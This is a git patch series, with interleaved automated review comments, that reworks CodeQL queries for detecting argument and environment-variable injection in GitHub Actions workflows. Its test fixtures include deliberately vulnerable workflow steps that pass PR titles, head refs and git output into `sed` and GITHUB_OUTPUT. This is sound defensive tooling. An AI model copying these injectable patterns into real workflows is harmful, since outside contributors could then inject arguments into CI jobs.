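Review bot: The redirection-stripping pattern added to `getCommand` only accepts targets made of `{}$"'_-` and alphanumerics, so a target containing `/` or `.` stays attached to the command; the fixture added in this same commit ends a `sed` call with `> /tmp/foo`, which this pattern does not appear to remove. The operator alternation also lacks `<<` and `&>`, so for `cat << EOL` only the trailing `< EOL` is removed and a dangling `<` is left, which is what the updated commands.expected rows seem to show. These normalised strings are what the argument-injection sink patterns are matched against, so leftover redirect text ends up in the captured argument. Consider replacing the target class with `[^\\s;|&]+` and adding `<<-?` and `&>` to the alternation. `getCommand` continues past the end of this hunk.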
@@ -633,6 +651,30 @@ module Bash { ) } + predicate envReachingArgumentInjectionSink( + BashShellScript script, string source, string command, string argument + ) { + exists(string cmd, string regex, int command_group, int argument_group | + cmd = script.getACommand() and + argumentInjectionSinksDataModel(regex, command_group, argument_group) and + argument = cmd.regexpCapture(regex, argument_group) and + command = cmd.regexpCapture(regex, command_group) and + envReachingRunExpr(script, source, argument) + ) + } + + predicate cmdReachingArgumentInjectionSink( + BashShellScript script, string source, string command, string argument + ) { + exists(string cmd, string regex, int command_group, int argument_group | + cmd = script.getACommand() and + argumentInjectionSinksDataModel(regex, command_group, argument_group) and + argument = cmd.regexpCapture(regex, argument_group) and + command = cmd.regexpCapture(regex, command_group) and + cmdReachingRunExpr(script, source, argument) + ) + } + /** * Holds if a command output is used, directly or indirectly, in a Run's step expression. * Where the expression is a string captured from the Run's script. diff --git a/ql/lib/codeql/actions/PowerShell.qll b/ql/lib/codeql/actions/PowerShell.qll index 1727930c2a3..3ae706970fa 100644 --- a/ql/lib/codeql/actions/PowerShell.qll +++ b/ql/lib/codeql/actions/PowerShell.qll @@ -42,6 +42,18 @@ class PowerShellScript extends ShellScript { override predicate getACmdReachingGitHubPathWrite(string cmd) { none() } + override predicate getAnEnvReachingArgumentInjectionSink( + string var, string command, string argument + ) { + none() + } + + override predicate getACmdReachingArgumentInjectionSink( + string cmd, string command, string argument + ) { + none() + } + override predicate fileToGitHubEnv(string path) { none() } override predicate fileToGitHubOutput(string path) { none() } 
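Review bot: `envReachingArgumentInjectionSink` and `cmdReachingArgumentInjectionSink` are added without QLDoc, although the predicate that follows them in the hunk is documented, and they repeat the same four conjuncts, differing only in the final `envReachingRunExpr` / `cmdReachingRunExpr` call. Each should get a short doc comment stating that it holds when `source` (an environment variable name, or a command string) reaches `argument`, where `command` and `argument` are captured from one of the script's commands by an argument-injection sink pattern. The shared capture logic could move into one private predicate over (script, command, argument), so that a later change to how sinks are captured cannot be applied to one source kind and missed for the other.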
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 43772a978c5..7c433a39e62 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -227,6 +227,14 @@ class ShellScriptImpl extends ScalarValueImpl { abstract predicate getACmdReachingGitHubPathWrite(string cmd); + abstract predicate getAnEnvReachingArgumentInjectionSink( + string var, string command, string argument + ); + + abstract predicate getACmdReachingArgumentInjectionSink( + string cmd, string command, string argument + ); + abstract predicate fileToGitHubEnv(string path); abstract predicate fileToGitHubOutput(string path); diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index a0309437292..f7e4a983445 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -9,23 +9,6 @@ abstract class ArgumentInjectionSink extends DataFlow::Node { abstract string getCommand(); } -/** - * Holds if an environment variable is used, directly or indirectly, as an argument to a dangerous command - * in a Run step. - * Where the command is a string captured from the Run's script. - */ -bindingset[var] -predicate envToArgInjSink(string var, Run run, string command) { - exists(string argument, string cmd, string regexp, int command_group, int argument_group | - run.getScript().getACommand() = cmd and - argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - command = cmd.regexpCapture(regexp, command_group) and - argument = cmd.regexpCapture(regexp, argument_group) and - Bash::envReachingRunExpr(run.getScript(), var, argument) and - exists(run.getInScopeEnvVarExpr(var)) - ) -} - /** * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. * e.g. 
@@ -36,23 +19,16 @@ predicate envToArgInjSink(string var, Run run, string command) { */ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { string command; + string argument; ArgumentInjectionFromEnvVarSink() { exists(Run run, string var | - envToArgInjSink(var, run, command) and run.getScript() = this.asExpr() and - exists(run.getInScopeEnvVarExpr(var)) - ) - or - exists( - Run run, string cmd, string argument, string regexp, int argument_group, int command_group - | - run.getScript().getACommand() = cmd and - run.getScript() = this.asExpr() and - argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - argument = cmd.regexpCapture(regexp, argument_group) and - command = cmd.regexpCapture(regexp, command_group) and - argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*") + ( + exists(run.getInScopeEnvVarExpr(var)) or + var = "GITHUB_HEAD_REF" + ) and + run.getScript().getAnEnvReachingArgumentInjectionSink(var, command, argument) ) } @@ -68,18 +44,13 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { */ class ArgumentInjectionFromCommandSink extends ArgumentInjectionSink { string command; + string argument; ArgumentInjectionFromCommandSink() { - exists( - CommandSource source, Run run, string cmd, string argument, string regexp, int argument_group, - int command_group - | + exists(CommandSource source, Run run | run = source.getEnclosingRun() and this.asExpr() = run.getScript() and - cmd = run.getScript().getACommand() and - argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - argument = cmd.regexpCapture(regexp, argument_group) and - command = cmd.regexpCapture(regexp, command_group) + run.getScript().getACmdReachingArgumentInjectionSink(source.getCommand(), command, argument) ) } 
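Review bot: The literal `"GITHUB_HEAD_REF"` in the `ArgumentInjectionFromEnvVarSink` characteristic predicate is repeated in `ArgumentInjectionConfig::isSource` later in this file's diff, so the set of runner-provided variables treated as attacker-controlled now lives in two places. If one site is extended and the other is not, source and sink stop agreeing and the flow is silently dropped. A small helper such as `private string untrustedDefaultEnvVar() { result = "GITHUB_HEAD_REF" }`, used at both sites, would keep them in step. The new `argument` field is bound here but not read in the visible part of the class; if nothing outside the hunk uses it, passing `_` to `getAnEnvReachingArgumentInjectionSink` would be clearer.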
@@ -103,14 +74,9 @@ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource or - exists( - Run run, string argument, string cmd, string regexp, int command_group, int argument_group - | + exists(Run run | run.getScript() = source.asExpr() and - run.getScript().getACommand() = cmd and - argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - argument = cmd.regexpCapture(regexp, argument_group) and - argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*") + run.getScript().getAnEnvReachingArgumentInjectionSink("GITHUB_HEAD_REF", _, _) ) } @@ -120,7 +86,7 @@ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { exists(Run run, string var | run.getInScopeEnvVarExpr(var) = pred.asExpr() and succ.asExpr() = run.getScript() and - envToArgInjSink(var, run, _) + run.getScript().getAnEnvReachingArgumentInjectionSink(var, _, _) ) } } diff --git a/ql/test/library-tests/commands.expected b/ql/test/library-tests/commands.expected index e78f152e60b..d5536ca1c74 100644 --- a/ql/test/library-tests/commands.expected +++ b/ql/test/library-tests/commands.expected 
@@ -22,15 +22,11 @@ | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 2 echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo qstr:0:0:12:34:githubeventcommentbody | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo qstr:2:0:12:34:githubeventcommentbody | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 2 echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 3 echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 3 echo qstr:0:0:12:34:githubeventcommentbody | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 3 echo qstr:2:0:12:34:githubeventcommentbody | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/multiline2.yml:11:9:15:6 | Run Step | echo "CHANGELOGEOF" | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | echo "changelog< issue.txt << EOL | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | cat > issue.txt < | | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | ${ISSUE_BODY} | | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | EOL | | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | FOO | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | cat << EOL | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | cat < | | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | tee -a $GITHUB_ENV | | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | EOF | | 
.github/workflows/multiline2.yml:52:9:58:6 | Run Step | Hello | | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | World | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | cat < file.txt | | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | EOF | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | cat <<-EOF | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | cat < | | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | tee -a "$GITHUB_ENV" | | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | cat issue.txt | 
@@ -84,77 +80,77 @@ | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | tr -d ' ' | | .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "$TITLE" | | .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "EOF" | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "CHANGELOGEOF" | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "$EOF" >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "status<<$EOF" >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "$EOF" >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo $output >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | } | | .github/workflows/multiline.yml:30:9:34:6 | Run Step | ${{ toJson(github.event) }} | | .github/workflows/multiline.yml:30:9:34:6 | Run Step | EOF | | .github/workflows/multiline.yml:30:9:34:6 | Run Step | cat <<-"EOF" > event.json | | .github/workflows/multiline.yml:34:9:40:6 | Run Step | ${ISSUE_BODY} | | .github/workflows/multiline.yml:34:9:40:6 | Run Step | EOL | | .github/workflows/multiline.yml:34:9:40:6 | Run Step | FOO | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | cat >> $GITHUB_ENV << EOL | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | cat >> $GITHUB_ENV < | | .github/workflows/multiline.yml:40:9:46:6 | Run Step | 
${ISSUE_BODY} | | .github/workflows/multiline.yml:40:9:46:6 | Run Step | EOL | | .github/workflows/multiline.yml:40:9:46:6 | Run Step | FOO | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | cat > issue.txt < | | .github/workflows/multiline.yml:46:9:52:6 | Run Step | ${ISSUE_BODY} | | .github/workflows/multiline.yml:46:9:52:6 | Run Step | EOL | | .github/workflows/multiline.yml:46:9:52:6 | Run Step | FOO | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL >> $GITHUB_ENV | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | EOF | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | Hello | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | World | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | cat < file.txt | | .github/workflows/multiline.yml:58:9:63:6 | Run Step | EOF | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF >> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF | | .github/workflows/multiline.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | cat issue.txt | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | sed 's/\\\\r/\\\\n/g' | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | tr -d ' ' | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo 
"$TITLE" >> $GITHUB_ENV | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "EOF" >> $GITHUB_ENV | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_ENV | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "$TITLE" | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "EOF" | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | } | | .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo '$ISSUE' | | .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo 'EOF' | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo 'JSON_RESPONSE< | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | } | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | echo 'JSON_RESPONSE< | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | } | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | venv/bin/activate | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | . venv/bin/activate | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | . venv/bin/activate | 
@@ -171,7 +167,7 @@ | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo foo | | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | sh venv/bin/activate.sh | | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | echo foo | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | sh venv/bin/activate.sh | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | python venv/bin/activate.py | | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | echo foo | | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | python venv/bin/activate.py | diff --git a/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml index 59ea1564bdd..42ba8bf2749 100644 --- a/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml +++ b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml @@ -34,3 +34,15 @@ jobs: - run: | BODY=$(git log --format=%s) sed "s/FOO/$BODY/g" > /tmp/foo + + - name: Checkout ref + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Detect new changesets + id: added-files + run: | + delimiter="$(openssl rand -hex 8)" + echo "changesets<<${delimiter}" >> "${GITHUB_OUTPUT}" + echo "$(git diff --name-only --diff-filter=A ${{ steps.comment-branch.outputs.base_sha }} ${{ steps.parse-sha.outputs.sha }} .changeset/*.md)" >> "${GITHUB_OUTPUT}" + echo "${delimiter}" >> "${GITHUB_OUTPUT}" diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected index 326cb935f7c..1e4051fef43 100644 --- a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected 
@@ -26,5 +26,4 @@ subpaths | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | -| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | git | | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | From b49cd3b916e792221221c0215df29e448fa91019 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 16 Oct 2024 08:48:32 +0200 Subject: [PATCH 0588/1267] Better handling of EnvVar Injection and Argument Injection --- ql/lib/codeql/actions/Bash.qll | 18 +++--- ql/lib/codeql/actions/config/Config.qll | 16 +---- .../codeql/actions/dataflow/FlowSources.qll | 4 +- .../actions/security/EnvVarInjectionQuery.qll | 57 ++++++++++++----- .../actions/security/PoisonableSteps.qll | 11 +--- .../security/UntrustedCheckoutQuery.qll | 8 +-- .../ext/config/argument_injection_sinks.yml | 15 +++-- ql/lib/ext/config/poisonable_steps.yml | 16 ++--- ql/lib/ext/config/untrusted_git_commands.yml | 26 ++++---- ql/test/library-tests/commands.expected | 36 +++++------ .../library-tests/poisonable_steps.expected | 1 - .../CWE-077/.github/workflows/test16.yml | 35 +++++++++++ .../CWE-077/EnvVarInjectionCritical.expected | 15 +++-- .../CWE-077/EnvVarInjectionMedium.expected | 11 ++-- .../.github/workflows/arg_injection.yml | 62 +++++++++++++------ .../ArgumentInjectionCritical.expected | 54 +++++++++------- .../CWE-088/ArgumentInjectionMedium.expected | 33 +++++----- 17 files changed, 246 insertions(+), 172 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml 
diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll index 12866a141a6..672f7727f5b 100644 --- a/ql/lib/codeql/actions/Bash.qll +++ b/ql/lib/codeql/actions/Bash.qll @@ -220,9 +220,13 @@ class BashShellScript extends ShellScript { override string getCommand(int i) { // remove redirection result = - this.getCmd(i).regexpReplaceAll("(>|>>|2>|2>>|<|<<<)\\s*[\\{\\}\\$\"'_\\-0-9a-zA-Z]+$", "") and + this.getCmd(i) + .regexpReplaceAll("(>|>>|2>|2>>|<|<<<)\\s*[\\{\\}\\$\"'_\\-0-9a-zA-Z]+$", "") + .trim() and // exclude variable declarations not result.regexpMatch("^[a-zA-Z0-9\\-_]+=") and + // exclude comments + not result.trim().indexOf("#") = 0 and // exclude the following keywords not result = [ @@ -359,11 +363,11 @@ module Bash { exists(string regexp | // $(cmd) regexp = ".*\\$\\(([^)]+)\\).*" and - cmd = expr.regexpCapture(regexp, 1) + cmd = expr.regexpCapture(regexp, 1).trim() or // `cmd` regexp = ".*`([^`]+)`.*" and - cmd = expr.regexpCapture(regexp, 1) + cmd = expr.regexpCapture(regexp, 1).trim() ) } @@ -657,8 +661,8 @@ module Bash { exists(string cmd, string regex, int command_group, int argument_group | cmd = script.getACommand() and argumentInjectionSinksDataModel(regex, command_group, argument_group) and - argument = cmd.regexpCapture(regex, argument_group) and - command = cmd.regexpCapture(regex, command_group) and + argument = cmd.regexpCapture(regex, argument_group).trim() and + command = cmd.regexpCapture(regex, command_group).trim() and envReachingRunExpr(script, source, argument) ) } 
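Review bot: In `getCommand` the redirection pattern is anchored with `$`, but `.trim()` runs only after `regexpReplaceAll`, so a command with whitespace after the redirect target would keep its redirection; whether `getCmd(i)` can carry trailing whitespace is not visible in this hunk. Trimming on both sides, `this.getCmd(i).trim().regexpReplaceAll(...).trim()`, removes that dependency. Since `result` is already trimmed, the second `.trim()` in the comment filter is redundant and the line can read `not result.indexOf("#") = 0`. `getCommand` continues past the end of this hunk.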
@@ -669,8 +673,8 @@ module Bash { exists(string cmd, string regex, int command_group, int argument_group | cmd = script.getACommand() and argumentInjectionSinksDataModel(regex, command_group, argument_group) and - argument = cmd.regexpCapture(regex, argument_group) and - command = cmd.regexpCapture(regex, command_group) and + argument = cmd.regexpCapture(regex, argument_group).trim() and + command = cmd.regexpCapture(regex, command_group).trim() and cmdReachingRunExpr(script, source, argument) ) } diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index e3bf239565e..82b7a53a9d7 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -47,10 +47,6 @@ predicate externallyTriggerableEventsDataModel(string event) { private string commandLauncher() { result = ["", "sudo\\s+", "su\\s+", "xvfb-run\\s+"] } -private string commandPrefixDelimiter() { result = "(^|;|\\$\\(|`|\\||&&|\\|\\|)\\s*" } - -private string commandSuffixDelimiter() { result = "\\s*(;|\\||\\)|`|&&|\\|\\||$)" } - /** * MaD models for poisonable commands * Fields: @@ -59,9 +55,7 @@ private string commandSuffixDelimiter() { result = "\\s*(;|\\||\\)|`|&&|\\|\\||$ predicate poisonableCommandsDataModel(string regexp) { exists(string sub_regexp | Extensions::poisonableCommandsDataModel(sub_regexp) and - // find regexp - regexp = - commandPrefixDelimiter() + commandLauncher() + sub_regexp + "(.*?)" + commandSuffixDelimiter() + regexp = commandLauncher() + sub_regexp + ".*" ) } @@ -74,10 +68,7 @@ predicate poisonableCommandsDataModel(string regexp) { predicate poisonableLocalScriptsDataModel(string regexp, int command_group) { exists(string sub_regexp | Extensions::poisonableLocalScriptsDataModel(sub_regexp, command_group) and - // capture regexp - regexp = - ".*" + commandPrefixDelimiter() + commandLauncher() + sub_regexp + commandSuffixDelimiter() + - ".*" + regexp = commandLauncher() + sub_regexp + ".*" ) } 
@@ -91,8 +82,7 @@ predicate poisonableLocalScriptsDataModel(string regexp, int command_group) { predicate argumentInjectionSinksDataModel(string regexp, int command_group, int argument_group) { exists(string sub_regexp | Extensions::argumentInjectionSinksDataModel(sub_regexp, command_group, argument_group) and - // capture regexp - regexp = ".*" + commandPrefixDelimiter() + sub_regexp // + commandSuffixDelimiter() + ".*" + regexp = commandLauncher() + sub_regexp ) } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index b30fd5495ed..a9967a72ee6 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -100,10 +100,10 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { ) and this.asExpr() = run.getScript() and checkout.getAFollowingStep() = run and - run.getScript().getACommand() = cmd and + run.getScript().getAStmt() = cmd and cmd.indexOf("git") = 0 and untrustedGitCommandsDataModel(cmd_regex, flag) and - cmd.regexpMatch(cmd_regex) + cmd.regexpMatch(".*" + cmd_regex + ".*") ) } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 214e97fed6b..13d6312b585 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll 
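Review bot: The unchanged conjunct `cmd.indexOf("git") = 0` still requires the matched string to begin with `git`, which looks at odds with the two changed lines around it: `getAStmt()` now supplies whole statements and the pattern is wrapped in `.*` on both sides. A statement that assigns the output of a `git` command substitution to a variable would presumably start with the variable name and never become a `GitCommandSource`, which means missed sources rather than noisy ones. If matching `git` anywhere in the statement is the intent, drop the prefix check or replace it with the containment test `cmd.matches("%git%")`. The characteristic predicate starts before this hunk.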
